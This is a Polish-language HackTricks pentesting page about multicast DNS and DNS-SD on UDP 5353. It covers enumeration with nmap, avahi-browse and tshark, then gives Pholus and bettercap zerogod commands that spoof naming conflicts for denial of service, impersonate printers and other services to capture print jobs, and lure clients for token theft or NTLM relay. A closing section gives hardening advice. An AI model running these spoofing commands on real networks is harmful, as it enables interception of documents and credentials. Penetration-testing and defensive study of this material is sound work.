maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md

8.1 KiB
Raw Blame History

5353/UDP Multicast DNS (mDNS) i DNS-SD

{{#include ../banners/hacktricks-training.md}}

Podstawowe informacje

Multicast DNS (mDNS) umożliwia rozwiązywanie nazw i odkrywanie usług podobnie jak DNS w lokalnym połączeniu bez serwera DNS unicast. Używa UDP/5353 oraz adresów multicast 224.0.0.251 (IPv4) i FF02::FB (IPv6). Odkrywanie usług DNS (DNS-SD, zazwyczaj używane z mDNS) zapewnia ustandaryzowany sposób enumeracji i opisu usług za pomocą rekordów PTR, SRV i TXT.

PORT     STATE SERVICE
5353/udp open  zeroconf

Kluczowe szczegóły protokołu, które często wykorzystasz podczas ataków:

  • Nazwy w strefie .local są rozwiązywane za pomocą mDNS.
  • Bit QU (Query Unicast) może żądać odpowiedzi unicast nawet dla pytań multicast.
  • Implementacje powinny ignorować pakiety, które nie pochodzą z lokalnego łącza; niektóre stosy nadal je akceptują.
  • Probing/ogłaszanie wymusza unikalne nazwy hostów/usług; zakłócanie tutaj tworzy warunki DoS/„squattingu nazw”.

Model usługi DNS-SD

Usługi są identyfikowane jako _._tcp lub _._udp w strefie .local, np. _ipp._tcp.local (drukarki), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge) itd. Odkryj typy za pomocą _services._dns-sd._udp.local, a następnie rozwiąż odkryte instancje do SRV/TXT/A/AAAA.

Eksploracja i enumeracja sieci

  • skanowanie celu nmap (bezpośredni mDNS na hoście):
nmap -sU -p 5353 --script=dns-service-discovery <target>
  • odkrywanie broadcastowe nmap (nasłuchuj segmentu i enumeruj wszystkie typy/instancje DNS-SD):
sudo nmap --script=broadcast-dns-service-discovery
  • avahi-browse (Linux):
# Lista typów usług
avahi-browse -bt _services._dns-sd._udp
# Przeglądaj wszystkie usługi i rozwiązuj do hosta/portu
avahi-browse -art
  • Apple dns-sd (macOS):
# Przeglądaj wszystkie usługi HTTP
dns-sd -B _http._tcp
# Enumeruj typy usług
dns-sd -B _services._dns-sd._udp
# Rozwiąż konkretną instancję do SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
  • Przechwytywanie pakietów z tshark:
# Przechwytywanie na żywo
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Tylko zapytania o listę usług DNS-SD
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Wskazówka: Niektóre przeglądarki/WebRTC używają efemerycznych nazw hostów mDNS, aby ukryć lokalne adresy IP. Jeśli zobaczysz kandydatów random-UUID.local w sieci, rozwiąż je za pomocą mDNS, aby przejść do lokalnych adresów IP.

Ataki

zakłócanie próbkowania nazw mDNS (DoS / squatting nazw)

Podczas fazy próbkowania host sprawdza unikalność nazw. Odpowiadanie sfałszowanymi konfliktami zmusza go do wyboru nowych nazw lub niepowodzenia. Może to opóźnić lub uniemożliwić rejestrację i odkrywanie usług.

Przykład z Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

Fałszowanie usług i podszywanie się (MitM)

Podszywaj się pod ogłaszane usługi DNS-SD (drukarki, AirPlay, HTTP, udostępnianie plików), aby zmusić klientów do połączenia się z tobą. Jest to szczególnie przydatne do:

  • Przechwytywania dokumentów poprzez fałszowanie _ipp._tcp lub _printer._tcp.
  • Wabić klientów do usług HTTP/HTTPS, aby zbierać tokeny/ciasteczka lub dostarczać ładunki.
  • Łączenie z technikami przekazywania NTLM, gdy klienci Windows negocjują uwierzytelnianie do fałszowanych usług.

Z modułem zerogod bettercap (fałszerz/podszywacz mDNS/DNS-SD):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

Również zobacz ogólne LLMNR/NBNS/mDNS/WPAD spoofing i przepływy przechwytywania/relayowania poświadczeń:

{{#ref}} ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}}

Uwagi dotyczące ostatnich problemów z implementacją (przydatne do DoS/persistentności podczas zaangażowań)

  • Błędy awarii Avahi reachable-assertion i D-Bus (2023) mogą zakończyć działanie avahi-daemon na dystrybucjach Linuksa (np. CVE-2023-38469..38473, CVE-2023-1981), zakłócając odkrywanie usług na docelowych hostach do czasu ponownego uruchomienia.
  • DoS bramy mDNS Cisco IOS XE Wireless LAN Controller (2024, CVE-2024-20303) pozwala sąsiednim atakującym na generowanie wysokiego obciążenia CPU i rozłączanie AP. Jeśli napotkasz bramę mDNS między VLAN-ami, bądź świadomy jej stabilności w przypadku źle sformułowanego lub wysokiego tempa mDNS.

Rozważania obronne i OPSEC

  • Granice segmentów: Nie routuj 224.0.0.251/FF02::FB między strefami bezpieczeństwa, chyba że brama mDNS jest wyraźnie wymagana. Jeśli musisz połączyć odkrywanie, preferuj listy dozwolone i limity prędkości.
  • Punkty końcowe/serwery Windows:
  • Aby trwale wyłączyć rozwiązywanie nazw za pomocą mDNS, ustaw wartość rejestru i uruchom ponownie:
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
  • W zarządzanych środowiskach wyłącz wbudowaną regułę zapory Windows Defender „mDNS (UDP-In)” (przynajmniej w profilu domeny), aby zapobiec przetwarzaniu mDNS przychodzącego, zachowując funkcjonalność domową/roamingową.
  • W nowszych wersjach Windows 11/ szablonach GPO użyj polityki „Konfiguracja komputera > Szablony administracyjne > Sieć > Klient DNS > Skonfiguruj protokół multicast DNS (mDNS)” i ustaw ją na Wyłączone.
  • Linux (Avahi):
  • Ogranicz publikowanie, gdy nie jest potrzebne: ustaw disable-publishing=yes i ogranicz interfejsy za pomocą allow-interfaces= / deny-interfaces= w /etc/avahi/avahi-daemon.conf.
  • Rozważ check-response-ttl=yes i unikaj enable-reflector=yes, chyba że jest to ściśle wymagane; preferuj reflect-filters= listy dozwolone podczas refleksji.
  • macOS: Ogranicz przychodzące mDNS w zaporach hosta/sieci, gdy odkrywanie Bonjour nie jest potrzebne dla konkretnych podsieci.
  • Monitorowanie: Powiadamiaj o nietypowych wzrostach zapytań _services._dns-sd._udp.local lub nagłych zmianach w SRV/TXT krytycznych usług; są to wskaźniki spoofingu lub podszywania się pod usługi.

Szybki przegląd narzędzi

  • nmap NSE: dns-service-discovery i broadcast-dns-service-discovery.
  • Pholus: aktywne skanowanie, odwrotne mDNS, pomocnicy DoS i spoofingu.
# Pasywne sniff (sekundy timeout)
sudo python3 pholus3.py <iface> -stimeout 60
# Wymień typy usług
sudo python3 pholus3.py <iface> -sscan
# Wyślij ogólne zapytania mDNS
sudo python3 pholus3.py <iface> --request
# Odwrotne skanowanie mDNS podsieci
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
  • bettercap zerogod: odkrywanie, zapisywanie, ogłaszanie i podszywanie się pod usługi mDNS/DNS-SD (zobacz powyższe przykłady).

Spoofing/MitM

Najciekawszym atakiem, który możesz przeprowadzić za pomocą tej usługi, jest przeprowadzenie MitM w komunikacji między klientem a prawdziwym serwerem. Możesz być w stanie uzyskać wrażliwe pliki (MitM komunikacji z drukarką) lub nawet poświadczenia (uwierzytelnianie Windows).
Aby uzyskać więcej informacji, sprawdź:

{{#ref}} ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}}

Odniesienia

{{#include ../banners/hacktricks-training.md}}